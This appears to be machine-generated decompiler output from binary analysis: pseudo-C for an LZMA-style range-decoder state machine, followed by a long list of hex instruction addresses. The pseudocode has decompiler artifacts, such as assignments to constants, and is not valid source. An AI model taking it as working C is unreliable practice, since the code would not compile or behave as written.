														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                      0x00000000
                      0x00406409
                      0x00406409
                      0x0040640d
                      0x0040641a
                      0x00406424
                      0x00000000
                      0x0040640f
                      0x0040640f
                      0x0040644a
                      0x0040644d
                      0x00406450
                      0x00406453
                      0x00406453
                      0x00406456
                      0x0040645d
                      0x00406462
                      0x00406343
                      0x00406346
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x004066bb
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406707
                      0x00000000
                      0x00000000
                      0x00406709
                      0x0040670d
                      0x004068bc
                      0x004068d2
                      0x004068da
                      0x004068e1
                      0x004068e3
                      0x004068ea
                      0x004068ee
                      0x004068ee
                      0x00406719
                      0x00406720
                      0x00406728
                      0x0040672b
                      0x0040672e
                      0x0040672e
                      0x00406734
                      0x00406734
                      0x00405ed0
                      0x00405ed0
                      0x00405ed0
                      0x00405ed9
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x00000000
                      0x00405eea
                      0x00000000
                      0x00000000
                      0x00405ef3
                      0x00405ef6
                      0x00405ef9
                      0x00405efd
                      0x00000000
                      0x00000000
                      0x00405f03
                      0x00405f06
                      0x00405f08
                      0x00405f09
                      0x00405f0c
                      0x00405f0e
                      0x00405f0f
                      0x00405f11
                      0x00405f14
                      0x00405f19
                      0x00405f1e
                      0x00405f27
                      0x00405f3a
                      0x00405f3d
                      0x00405f49
                      0x00405f71
                      0x00405f73
                      0x00405f81
                      0x00405f81
                      0x00405f85
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405f75
                      0x00405f75
                      0x00405f78
                      0x00405f79
                      0x00405f79
                      0x00000000
                      0x00405f75
                      0x00405f4f
                      0x00405f54
                      0x00405f54
                      0x00405f5d
                      0x00405f65
                      0x00405f68
                      0x00000000
                      0x00405f6e
                      0x00405f6e
                      0x00000000
                      0x00405f6e
                      0x00000000
                      0x00405f8b
                      0x00405f8b
                      0x00405f8f
                      0x0040683b
                      0x00000000
                      0x0040683b
                      0x00405f98
                      0x00405fa8
                      0x00405fab
                      0x00405fae
                      0x00405fae
                      0x00405fae
                      0x00405fb1
                      0x00405fb5
                      0x00000000
                      0x00000000
                      0x00405fb7
                      0x00405fbd
                      0x00405fe7
                      0x00405fed
                      0x00405ff4
                      0x00000000
                      0x00405ff4
                      0x00405fc3
                      0x00405fc6
                      0x00405fcb
                      0x00405fcb
                      0x00405fd6
                      0x00405fde
                      0x00405fe1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406026
                      0x0040602c
                      0x0040602f
                      0x0040603c
                      0x00406044
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x00000000
                      0x00405ffb
                      0x00405ffb
                      0x00405fff
                      0x0040684a
                      0x00000000
                      0x0040684a
                      0x0040600b
                      0x00406016
                      0x00406016
                      0x00406016
                      0x00406019
                      0x0040601c
                      0x0040601f
                      0x00406024
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406707
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040604c
                      0x0040604e
                      0x00406051
                      0x004060c2
                      0x004060c5
                      0x004060c8
                      0x004060cf
                      0x004060d9
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x004066b8
                      0x00406053
                      0x00406057
                      0x0040605a
                      0x0040605c
                      0x0040605f
                      0x00406062
                      0x00406064
                      0x00406067
                      0x00406069
                      0x0040606e
                      0x00406071
                      0x00406074
                      0x00406078
                      0x0040607f
                      0x00406082
                      0x00406089
                      0x0040608d
                      0x00406095
                      0x00406095
                      0x00406095
                      0x0040608f
                      0x0040608f
                      0x0040608f
                      0x00406084
                      0x00406084
                      0x00406084
                      0x00406099
                      0x0040609c
                      0x004060ba
                      0x004060bc
                      0x00000000
                      0x0040609e
                      0x0040609e
                      0x004060a1
                      0x004060a4
                      0x004060a7
                      0x004060a9
                      0x004060a9
                      0x004060a9
                      0x004060ac
                      0x004060af
                      0x004060b1
                      0x004060b2
                      0x004060b5
                      0x00000000
                      0x004060b5
                      0x00000000
                      0x004062eb
                      0x004062ef
                      0x0040630d
                      0x00406310
                      0x00406317
                      0x0040631a
                      0x0040631d
                      0x00406320
                      0x00406323
                      0x00406326
                      0x00406328
                      0x0040632f
                      0x00406330
                      0x00406332
                      0x00406335
                      0x00406338
                      0x0040633b
                      0x0040633b
                      0x00406340
                      0x00000000
                      0x00406340
                      0x004062f1
                      0x004062f4
                      0x004062f7
                      0x00406301
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00000000
                      0x00406355
                      0x00406359
                      0x0040637c
                      0x0040637f
                      0x00406382
                      0x0040638c
                      0x0040635b
                      0x0040635b
                      0x0040635e
                      0x00406361
                      0x00406364
                      0x00406371
                      0x00406374
                      0x00406374
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00000000
                      0x00406398
                      0x0040639c
                      0x00000000
                      0x00000000
                      0x004063a2
                      0x004063a6
                      0x00000000
                      0x00000000
                      0x004063ac
                      0x004063ae
                      0x004063b2
                      0x004063b2
                      0x004063b5
                      0x004063b9
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406430
                      0x00406434
                      0x0040643b
                      0x0040643e
                      0x00406441
                      0x00406436
                      0x00406436
                      0x00406436
                      0x00406444
                      0x00406447
                      0x00000000
                      0x00000000
                      0x004064f0
                      0x004064f0
                      0x004064f4
                      0x00406892
                      0x00000000
                      0x00406892
                      0x004064fa
                      0x004064fd
                      0x00406500
                      0x00406504
                      0x00406507
                      0x0040650d
                      0x0040650f
                      0x0040650f
                      0x0040650f
                      0x00406512
                      0x00406515
                      0x00000000
                      0x00000000
                      0x004060e5
                      0x004060e5
                      0x004060e9
                      0x00406856
                      0x00000000
                      0x00406856
                      0x004060ef
                      0x004060f2
                      0x004060f5
                      0x004060f9
                      0x004060fc
                      0x00406102
                      0x00406104
                      0x00406104
                      0x00406104
                      0x00406107
                      0x0040610a
                      0x0040610a
                      0x0040610d
                      0x00406110
                      0x00000000
                      0x00000000
                      0x00406116
                      0x0040611c
                      0x00000000
                      0x00000000
                      0x00406122
                      0x00406122
                      0x00406126
                      0x00406129
                      0x0040612c
                      0x0040612f
                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x0040614d
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406180
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406189
                      0x00406190
                      0x00406193
                      0x00000000
                      0x00406199
                      0x00000000
                      0x00406199
                      0x00000000
                      0x0040619e
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c3
                      0x004061c3
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e6
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406211
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x00406216
                      0x0040621d
                      0x00406220
                      0x00000000
                      0x00406222
                      0x00000000
                      0x00406222
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00000000
                      0x00000000
                      0x00406262
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x004066b8
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x00000000
                      0x00406776
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00406734
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00406734
                      0x00406734
                      0x00000000
                      0x0040673a
                      0x00406734
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067d8
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x0040680a
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
